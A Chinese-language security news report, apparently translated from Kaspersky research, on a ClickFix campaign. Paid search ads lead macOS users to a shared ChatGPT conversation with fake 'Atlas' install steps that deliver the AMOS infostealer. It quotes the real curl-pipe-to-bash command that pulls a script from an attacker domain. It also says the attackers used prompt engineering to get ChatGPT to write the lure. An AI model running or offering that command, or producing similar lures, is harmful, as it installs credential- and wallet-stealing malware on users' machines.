新型 ClickFix 攻击利用 ChatGPT 传播信息窃取木马
- 浏览次数 540
- 喜欢 0
HackerNews 编译,转载请注明出处:
一场新的恶意活动正通过一种新颖的攻击方式针对macOS用户,该攻击利用了ChatGPT的官方网站。
攻击者采用一种名为“ClickFix”的技术,通过在合法的chatgpt.com域名上发布虚假的安装指南来传播AMOS信息窃取木马。
此次活动利用了ChatGPT的聊天分享功能,任何用户都可以创建一个公共对话,并通过一个看似源自OpenAI官方网站的链接与他人分享。
攻击始于谷歌上的付费搜索广告。当用户搜索“chatgpt atlas”时,他们会遇到看似直接跳转到官方ChatGPT域名的赞助商链接。
谷歌搜索结果中的一个赞助商链接指向一个伪装成“macOS版ChatGPT Atlas”的恶意软件安装指南,该指南竟托管在官方ChatGPT网站上(来源:卡巴斯基)
该广告显示标题“ChatGPT™ Atlas for macOS – 下载Mac版ChatGPT Atlas”,这使其看起来完全合法。
点击这些广告的用户会被引导至一个共享的ChatGPT对话,其中包含针对不存在的Atlas浏览器的虚假安装说明。
经过深入分析,卡巴斯基安全研究人员确认,恶意行为者使用了提示词工程,迫使ChatGPT生成了一个看似可信的安装指南。
攻击者在将聊天公开之前,清除了聊天记录以移除任何可疑内容。
这个所谓的macOS版Atlas安装指南,仅仅是一个匿名用户与ChatGPT之间的共享聊天记录(来源:卡巴斯基)
该指南出现在chatgpt.com/share/子域名下,这可能会让那些未能意识到这只是一个共享对话而非OpenAI官方内容的用户,感觉其更加可信。
感染机制
虚假安装指南指示用户在Mac上打开终端应用程序,并运行一个特定命令。
恶意代码如下所示:
/bin/bash -c “$(curl -fsSL ‘https://atlas-extension.com/gt’)”
此命令会从攻击者控制的服务器atlas-extension.com下载恶意脚本,并立即在受害者的计算机上执行。
脚本执行后,会提示输入系统密码,并反复询问直到输入正确密码为止。一旦密码被提供,脚本就会下载AMOS信息窃取木马,并使用窃取的凭证进行安装。
如果你询问ChatGPT是否应该遵循收到的指令,它会回答这不安全。
AMOS能够窃取Chrome和Firefox浏览器的密码、Cookie及其他浏览器数据。它还会从Electrum、Coinomi和Exodus等应用程序中窃取加密货币钱包信息。
该恶意软件会从桌面、文档和下载等文件夹中收集TXT、PDF和DOCX扩展名的文件。此外,它还会安装一个后门程序,该程序会在系统启动时自动运行,使攻击者能够持久远程访问受感染的系统。